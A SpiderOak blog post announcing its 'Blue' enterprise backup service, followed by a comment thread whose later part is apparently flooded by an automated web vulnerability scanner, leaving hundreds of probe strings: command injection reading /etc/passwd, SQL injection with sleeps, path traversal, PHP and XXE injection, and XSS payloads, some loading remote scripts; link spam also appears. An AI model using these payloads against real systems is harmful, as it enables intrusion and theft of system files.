Conversations about life & privacy in the digital age

SpiderOak: Blue for Enterprise

Imagine yourself the CIO of a major company, walking down the street and thinking (as CIOs tend to), “gosh, I love SpiderOak, but it’s just too awkward to use across my company!”

At this point, I teleport in. “But wait!” I exclaim. “We’re now working on a solution just for you and your business! SpiderOak Blue!”

More seriously, we understand centralized management and provisioning will make or break a product geared for the business market; after all, who has time (or the money to pay for the time) to go and individually administer each unique SpiderOak user account? What if Bob and his laptop both wind up under the bus? How will you get Bob’s work data back?

Here at SpiderOak Business Labs, we’ve looked at the problem from the perspective of data ownership. Our consumer oriented product places ownership in the hands of the end-user. The user is the only one with the keys to unlock and look at plaintext data. And whereas this is the perfect scenario in the consumer world, it breaks down in a business setting where ownership of the data belongs to the company. And even still, perhaps you are a university wanting to purchase accounts for your student body in bulk. Of course you want the ability to maintain the accounts but also have no visibility into the plaintext data itself. We have worked hard and been successful in suitably covering all of the above cases and more.

So how does all this work? How does SpiderOak allow companies to retain ownership of the data while never having plaintext visibility? To answer that question, we turn to our ‘Zero-Knowledge’ privacy policy and encryption methods – all of which make this an interesting system to support. We’ve developed two distinct methods – both of which keep SpiderOak ‘Zero-Knowledge’ while letting the organization retain full-knowledge.

If you then add the complexity and pain around managing both individual user accounts as well as companywide deployments, you add yet another layer. So – we have created a system where administrators gain full control of SpiderOak from one central location.

With no further ado, dear and humble reader, may I introduce to you…

SpiderOak: Blue

What does this get you? Let’s take a look at the feature list.

Base Features:

  • The same capabilities and meaningful privacy guarantees as our consumer product (‘Zero-Knowledge’ privacy standard)
  • Central, easy-to-use web-based management console allowing user provisioning, group permissions, space management, and user reporting
  • Selective enable/disable of web and mobile access to SpiderOak accounts.
  • Bulk creation and management of user accounts (along with editing and downloading via CSV)
  • Detailed reports on user activity and problems across your deployment
  • You only buy space, and divide it among your users as you see fit. No silly per-user or per-device fees, or charging you extra to backup a server. Plain and simple pricing.
  • Ability to follow policy-set permissions in the Windows Registry (on Windows), or as a text file in /etc (Linux) or /Library (Mac)
  • Easy-to-deploy MSI installers for 32-bit and 64-bit Windows

SpiderOak: Blue OpenLicense

This product is based on our current OpenLicense program. In fact, a large part of Blue came from addressing limitations in the current OL program.

  • Data Ownership Model: The end user, not the organization. A user who forgets their password needs a new account.

SpiderOak: Blue

This is our ‘standard’ tier of Blue service.

  • Data Ownership Model: The organization.
  • Password resets possible via browser-driven ‘Zero-Knowledge’ encryption in the management interface.
  • Non-’Zero-Knowledge’ user data auditing interface

SpiderOak: Blue Plus

This is the top-shelf enterprise-grade SpiderOak, for those with ultimate management needs. Everything that follows here is made possible by our Blue Virtual Appliance, which puts all management control into an open-source virtual machine running on your infrastructure. You get full control over the data flowing into and out of SpiderOak from your organization, while we stay completely ‘Zero-Knowledge’.

  • You host your organization’s private keys. Key escrow lets you have full and complete control over the data by enabling you to hold onto the master private keys (which are normally generated via a key derivation scheme based on the user’s password).
  • User account integration with Microsoft Active Directory, OpenLDAP, and RedHat Directory Server. Define LDAP groups, point the appliance at them, and those users automatically show up on SpiderOak.
  • Integrated password management via LDAP or RADIUS. Due to use of key escrow technology, passwords for Blue Plus are only for authenticating users. Via the magic of the virtual appliance we can authenticate against your organization’s existing authentication infrastructure. SecurID? No problem!
  • ‘Zero-Knowledge’ (to us) web and mobile access. This VM can also host a local copy of the web access portal – providing on-the-go access to your users while we remain ‘Zero-Knowledge’.
  • Through the magic of the above web access, the user auditing / administrative data restoration console is also Zero-Knowledge from our perspective.

Interested?

SpiderOak Blue is now available through a limited release. We have been working with several large enterprises through the beta period and will continue towards general release. If you’re curious about the product, please send an email to blueinfo@spideroak.com and we will get back to you soon.

Comments

  1. Steven says:

    Awesome! Dropbox is verboten at my company but people are clamoring for a secure sync/sharing solution. Any hints on the secret handshake? :-P

  2. Jeremy says:

    Now this is something I seriously think is a great move for you guys!

  3. Sara says:

    I cant wait to send jobs to our print shop over SpiderOak. NO MORE FTP!

  4. Tariq says:

    Will there be any minimum space limit or just the normal? Any restriction on max number of users ?

  5. Jr says:

    How will data de-duplication be handled with SO:B?

  6. SpiderMatt says:

    @Jr: Currently, data de-dupe will only be within individual accounts still, and not among the users of an enterprise.

  7. GC says:

    This sounds amazing, it would be great to have some of these features for those of us who also handle our household's data backup from several systems.

  8. online backup says:

    Awesome the link and the blogs is been mentioned here is totally very very informative and best of the entire blogs. It i perfect to adverse that why the online computer backup is essential. Recently i got my systems online back up and know it had made me relaxed. I would just take an advice from you that whether the services they are offering is the genuine and the best at their parts or not.
    <a href="http://www.quickbackup.com.au/">online backup</a>

  9. enboig says:

    I think de-dupe should be a must. At my company users share folders, so I would need any user backup own files and shared, so they would also be capable of restoring them individually (no need to ask IT for a server file restore).

  10. Tilman Baumann says:

    Perfect for what I need. But I just rolled out the classic spideroak setup with shared account for all machines.
    I was not too impressed with the proposed cost structure.

  11. Dave Bushong says:

    Very exciting – this seems to solve a long-time problem between my data center and remote customers. I can hardly wait (but I will, since anything less would be a compromise I am not willing to make).

  12. Vincent says:

    My org just talked to someone in sales about this and they mentioned that de-duplication was going to be part of the Blue offering. If that isn't correct then that is disappointing and makes the pricing less attractive for sure.

  13. Craig Olofson says:

    How does "blue" relate to SpiderOak's Nimbus-dot-io?

  14. Dropbox = dead says:

    Thanks guys! This stuff works great!

  15. Troy says:

    Will this allow me to buy a large bulk of storage to backup a server (we use SBS2008) and then selectively give access to folders? I was looking a while back for a service that I could do something like that with, so I'm hoping Blue will be what I was looking for.

    Ideally I could backup the whole server to protect the data, and then I could give remote offices access to specific folders. Say Team1 gets access to a sync'd copy of the Team1 folder from the server backup. Management gets access to the management folder, and a manager on Team1 would have access to both via their account.

    Would be perfect for my traveling users to be able to have access to an updated sync of their specific shares while also having that data online and backed up securely.

  16. MariaBurch32 says:

    Set your own life time easier get the <a href="http://goodfinance-blog.com/topics/home-loans">home loans</a> and all you require.

  17. william milkiewicz says:

    get me a loan

  18. jmck says:

    Org-wide deduce would surely save everyone a lot of space…

  19. ppupsdpw says:

    1

  20. pxgxdwec says:

    response.write(9351011*9009893)

  21. pxgxdwec says:

    '+response.write(9351011*9009893)+'

  22. rruggstk says:

    &cat /etc/passwd&

  23. fldwhpvp says:

    SomeCustomInjectedHeader:injected_by_wvs

  24. jqfqewqw says:

    1

  25. pxgxdwec says:

    "+response.write(9351011*9009893)+"

  26. rruggstk says:

    '&cat /etc/passwd&'

  27. fldwhpvp says:

    SomeCustomInjectedHeader:injected_by_wvs

  28. response.write(9293727*9184619) says:

    1

  29. jqfqewqw says:

    1

  30. rruggstk says:

    "&cat /etc/passwd&"

  31. fldwhpvp says:

    SomeCustomInjectedHeader:injected_by_wvs

  32. jqfqewqw says:

    -1 or 40=40

  33. rruggstk says:

    cat /etc/passwd

  34. jqfqewqw says:

    -1 or 40=0

  35. rruggstk says:

    `cat /etc/passwd`

  36. jqfqewqw says:

    -1' or '96'='96

  37. ewlkfvle says:

    ../../../../../../../../../../etc/passwd

  38. rruggstk says:

    |cat /etc/passwd#

  39. pxgxdwec says:

    1

  40. rruggstk says:

    '|'ld

  41. jqfqewqw says:

    -1' or '96'='0

  42. ewlkfvle says:

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

  43. pxgxdwec says:

    1

  44. fldwhpvp says:

    1

  45. rruggstk says:

    "|"ld

  46. fldwhpvp says:

    1

  47. yyrlxnoj says:

    1

  48. ewlkfvle says:

    ../../../../../../../../../../etc/passwd

  49. jqfqewqw says:

    -1" or "21"="21

  50. pxgxdwec says:

    1

  51. rruggstk says:

    ;cat /etc/passwd;

  52. fldwhpvp says:

    1

  53. jqfqewqw says:

    -1" or "21"="0

  54. ewlkfvle says:

    Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

  55. bhnexudk says:

    ${99565+100259}

  56. fcykmour says:
  57. ewlkfvle says:

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

  58. jqfqewqw says:

    1 and sleep(4)

  59. ${99628+100010} says:

    1

  60. rruggstk says:

    ';cat /etc/passwd;'

  61. Q0hBM1BrWGI= says:

    1

  62. yyrlxnoj says:

    268435455

  63. fcykmour says:

    1some_inexistent_file_with_long_name%00.jpg

  64. ewlkfvle says:

    /../..//../..//../..//../..//../..//etc/passwd

  65. jqfqewqw says:

    1 or (sleep(4)+1) limit 1 –

  66. bhnexudk says:

    1

  67. rruggstk says:

    ";cat /etc/passwd;"

  68. fedcupkk says:

    1&n904568=v970006

  69. yyrlxnoj says:

  70. fcykmour says:
  71. jqfqewqw says:

    1' and sleep(4)='

  72. ewlkfvle says:

    .\./.\./.\./.\./.\./.\./etc/passwd

  73. mlfgodww says:

    )

  74. rruggstk says:

    ||cat /etc/passwd

  75. yyrlxnoj says:

    ..�

  76. yyrlxnoj says:

    1e309

  77. mlfgodww says:

    !(()&&!|*|*|

  78. kfxvnike&n991794=v946655 says:

    1

  79. yyrlxnoj says:

    '"'")

  80. mlfgodww says:

    ^(#$!@#$)(()))******

  81. ewlkfvle says:

    /etc/passwd

  82. jqfqewqw says:

    1' and (sleep(4)+1) limit 1 –

  83. rruggstk says:

    &dir

  84. ) says:

    1

  85. ewlkfvle says:

    ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

  86. jqfqewqw says:

    1" and sleep(4)="

  87. tnnkipod says:

    1

  88. yyrlxnoj says:

    1

  89. rruggstk says:

    '&dir&'

  90. !(()&&!|*|*| says:

    1

  91. fcykmour says:

    1

  92. ewlkfvle says:

    ../…/.././../…/.././../…/.././../…/.././../…/.././../…/.././etc/passwd

  93. jqfqewqw says:

    1' or (sleep(4)+1) limit 1 –

  94. rruggstk says:

    "&dir&"

  95. ^(#$!@#$)(()))****** says:

    1

  96. ewlkfvle says:

    ..�..�..�..�..�..�..�..�etc/passwd

  97. fcykmour says:

    1

  98. 268435455 says:

    1

  99. jqfqewqw says:

    1" or (sleep(4)+1) limit 1 –

  100. ewlkfvle says:

    invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

  101. rruggstk says:

    |dir

  102. mlfgodww says:

    1

  103. fcykmour says:

    1

  104. says:

    1

  105. jqfqewqw says:

    1'=sleep(4)='

  106. rruggstk says:

    '|dir

  107. ewlkfvle says:

    file:///etc/passwd

  108. mlfgodww says:

    1

  109. qtndswrm says:

    ;print(md5(acunetix_wvs_security_test));

  110. ..� says:

    1

  111. jqfqewqw says:

    1"=sleep(4)="

  112. ewlkfvle says:

    /../../../../../../../etc/passwd

  113. rruggstk says:

    "|dir

  114. mlfgodww says:

    1

  115. qtndswrm says:

    ';print(md5(acunetix_wvs_security_test));$a='

  116. jqfqewqw says:

    1;select pg_sleep(4); –

  117. 1e309 says:

    1

  118. &cat /etc/passwd& says:

    1

  119. ewlkfvle says:

    ../../../../../../../../../../windows/win.ini

  120. kpdkllfo says:
  121. qtndswrm says:

    ";print(md5(acunetix_wvs_security_test));$a="

  122. jqfqewqw says:

    1';select pg_sleep(4); –

  123. '&cat /etc/passwd&' says:

    1

  124. qtndswrm says:

    ${@print(md5(acunetix_wvs_security_test))}

  125. jqfqewqw says:

    1; waitfor delay '0:0:4' –

  126. "&cat /etc/passwd&" says:

    1

  127. kpdkllfo says:

    1

  128. qtndswrm says:

    ${@print(md5(acunetix_wvs_security_test))}

  129. ihlnlesa says:

    '"()

  130. '"'") says:

    1

  131. ewlkfvle says:

    ../../../../../../../../../../boot.ini

  132. jqfqewqw says:

    1'; waitfor delay '0:0:4' –

  133. cat /etc/passwd says:

    1

  134. njphwuij says:

    1

  135. ewlkfvle says:

    ../../../../../../../../../../windows/win.ini

  136. `cat /etc/passwd` says:

    1

  137. jqfqewqw says:

    1"; waitfor delay '0:0:4' –

  138. njphwuij says:

    acunetix_wvs_invalid_filename

  139. ewlkfvle says:

    ������������������������windows�win.ini

  140. '"() says:

    1

  141. |cat /etc/passwd# says:

    1

  142. jqfqewqw says:

    1

  143. yyrlxnoj says:

    1

  144. njphwuij says:

    20120321201659-spideroak-blue-for-enterprise

  145. ihlnlesa says:

    1

  146. ewlkfvle says:

    …………….windowswin.ini

  147. '|'ld says:

    1

  148. jqfqewqw says:

    1

  149. yyrlxnoj says:

    1

  150. njphwuij says:

    20120321201659-spideroak-blue-for-enterprise

  151. ihlnlesa says:

    1

  152. ewlkfvle says:

    …………….windowswin.ini

  153. -1 or 47=47 says:

    1

  154. "|"ld says:

    1

  155. yyrlxnoj says:

    1

  156. njphwuij says:

    20120321201659-spideroak-blue-for-enterprise/.

  157. caicbfqp says:
  158. ewlkfvle says:

    /.\./.\./.\./.\./.\./.\./windows/win.ini

  159. ;cat /etc/passwd; says:

    1

  160. -1 or 47=0 says:

    1

  161. yyrlxnoj says:

    1

  162. njphwuij says:

    1

  163. qtndswrm says:

    1

  164. ewlkfvle says:

    ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

  165. ';cat /etc/passwd;' says:

    1

  166. -1' or '107'='107 says:

    1

  167. yyrlxnoj says:

    1

  168. acunetix_wvs_invalid_filename says:

    1

  169. qtndswrm says:

    1

  170. rhksuujk says:

    1

  171. ewlkfvle says:

    ../…/.././../…/.././../…/.././../…/.././../…/.././../…/.././windows/win.ini

  172. caicbfqp says:

    1

  173. ";cat /etc/passwd;" says:

    1

  174. -1' or '107'='0 says:

    1

  175. yyrlxnoj says:

    1

  176. ewlkfvle says:

    unexisting/../../../../../../../../../../windows/win.ini………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….

  177. qtndswrm says:

    1

  178. rhksuujk says:

    1'"

  179. xixqdknf says:

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  180. ||cat /etc/passwd says:

    1

  181. -1" or "40"="40 says:

    1

  182. yyrlxnoj says:

    1

  183. rhksuujk says:
  184. qtndswrm says:

    1

  185. -1" or "40"="0 says:

    1

  186. &dir says:

    1

  187. yyrlxnoj says:

    1

  188. xixqdknf says:

    1

  189. njphwuij says:

    1

  190. '&dir&' says:

    1

  191. rhksuujk says:

    1�xa7�

  192. qtndswrm says:

    1

  193. jqfqewqw' and sleep(4)=' says:

    1

  194. rnyncaas says:

    //www.acunetix.tst

  195. sfenxnvh says:

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE acunetix [
    <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"&gt;
    ]>
    <xxx>&acunetixent;</xxx>

  196. njphwuij says:

    1

  197. hufljoib says:

    '"

  198. rhksuujk says:

    @@qaqoP

  199. "&dir&" says:

    1

  200. //www.acunetix.tst says:

    1

  201. njphwuij says:

    1

  202. hufljoib says:

    <!–

  203. rhksuujk says:

    JyI=

  204. |dir says:

    1

  205. jqfqewqw" and sleep(4)=" says:

    1

  206. rnyncaas says:

    1

  207. njphwuij says:

    1

  208. sfenxnvh says:

    1

  209. '" says:

    1

  210. rhksuujk says:

    �'�"

  211. '|dir says:

    1

  212. xidokdan says:

    '"()&%1<ScRiPt >prompt(964173)</ScRiPt>

  213. njphwuij says:

    1

  214. <!-- says:

    1

  215. "|dir says:

    1

  216. rhksuujk says:

    �""

  217. hufljoib says:

    1

  218. /etc/passwd says:

    1

  219. rruggstk says:

    1

  220. jqfqewqw'=sleep(4)=' says:

    1

  221. rhksuujk says:

    1

  222. xidokdan says:

    OTQzOTgw

  223. hufljoib says:

    1

  224. rruggstk says:

    1

  225. jqfqewqw"=sleep(4)=" says:

    1

  226. 1'" says:

    1

  227. rruggstk says:

    1

  228. Anonymous says:

    1

  229. jqfqewqw and sleep(4) says:

    1

  230. rruggstk says:

    1

  231. 1�xa7� says:

    1

  232. rruggstk says:

    1

  233. xidokdan says:

    undefined1<ScRiPt >prompt(986332)</ScRiPt>

  234. file:///etc/passwd says:

    1

  235. @@af8AL says:

    1

  236. jqfqewqw';select pg_sleep(4); -- says:

    1

  237. rruggstk says:

    1

  238. JyI= says:

    1

  239. rruggstk says:

    1

  240. �'�" says:

    1

  241. xidokdan says:

    1<ScRiPt
    >prompt(978478)</ScRiPt>

  242. rruggstk says:

    1

  243. jqfqewqw says:

    1

  244. rruggstk says:

    1

  245. �"" says:

    1

  246. rhksuujk says:

    1

  247. jqfqewqw says:

    1

  248. rruggstk says:

    1

  249. rruggstk says:

    1

  250. xidokdan says:

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?916614></ScRiPt>

  251. rhksuujk says:

    1

  252. jqfqewqw says:

    1

  253. rruggstk says:

    1

  254. ................windowswin.ini says:

    1

  255. rhksuujk says:

    1

  256. jqfqewqw says:

    1

  257. rruggstk says:

    1

  258. rhksuujk says:

    1

  259. xidokdan says:

    1<

  260. jqfqewqw says:

    1

  261. rruggstk says:

    1

  262. rhksuujk says:

    1

  263. jqfqewqw says:

    1

  264. rruggstk says:

    1

  265. jqfqewqw says:

    1

  266. rhksuujk says:

    1

  267. jqfqewqw says:

    1

  268. jqfqewqw says:

    1

  269. rruggstk says:

    1

  270. xidokdan says:

    <video><source onerror="javascript:prompt(939497)">

  271. rhksuujk says:

    1

  272. rhksuujk says:

    1

  273. jqfqewqw says:

    1

  274. rruggstk says:

    1

  275. jqfqewqw says:

    1

  276. ewlkfvle says:

    1

  277. rruggstk says:

    1

  278. ewlkfvle says:

    1

  279. xidokdan says:

    <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(994828)"></g></svg>

  280. jqfqewqw says:

    1

  281. ewlkfvle says:

    1

  282. ewlkfvle says:

    1

  283. jqfqewqw says:

    1

  284. xidokdan says:

    1[url=javascript:prompt(910168)]http://www.acunetix.com[/url]

  285. ewlkfvle says:

    1

  286. jqfqewqw says:

    1

  287. ewlkfvle says:

    1

  288. ewlkfvle says:

    1

  289. jqfqewqw says:

    1

  290. xidokdan says:

    1<div style=width:expression(prompt(986326))>

  291. ewlkfvle says:

    1

  292. jqfqewqw says:

    1

  293. jqfqewqw says:

    1

  294. ewlkfvle says:

    1

  295. ewlkfvle says:

    1

  296. xidokdan says:

    <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='940345'>

  297. jqfqewqw says:

    1

  298. jqfqewqw says:

    1

  299. jqfqewqw says:

    1

  300. ewlkfvle says:

    1

  301. ewlkfvle says:

    1

  302. ewlkfvle says:

    1

  303. xidokdan says:

    <body onload=prompt(971777)>

  304. ewlkfvle says:

    1

  305. ewlkfvle says:

    1

  306. ewlkfvle says:

    1

  307. ewlkfvle says:

    1

  308. xidokdan says:

    <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963473)>

  309. ewlkfvle says:

    1

  310. ewlkfvle says:

    1

  311. ewlkfvle says:

    1

  312. ewlkfvle says:

    1

  313. xidokdan says:

    <img src=xyz OnErRor=prompt(917822)>

  314. ewlkfvle says:

    1

  315. ewlkfvle says:

    1

  316. ewlkfvle says:

    1

  317. xidokdan says:

    <img/src=">" onerror=alert(932704)>

  318. xidokdan says:

    1%3CScRiPt%20%3Eprompt(983653)%3C/sCripT%3E

  319. xidokdan says:

    �g acu onmouseover=prompt(912624) //�

  320. xidokdan says:

    <input autofocus onfocus=prompt(959669)>

  321. xidokdan says:

    wn3ql
    1<ScRiPt >prompt(965311)</ScRiPt>

  322. OTI3OTc4 says:

    1

  323. 1< says:

    1

  324. lhwemwcn says:

    1

  325. Perplexed says:

    WHY don't you moderate your blog and get rid of all the spam?

  326. Igr says:

    I agree with Perplexed. This is pathetic guys!

  327. Drew says:

    I'm not sure if I can trust a company that can't even moderate their own forums…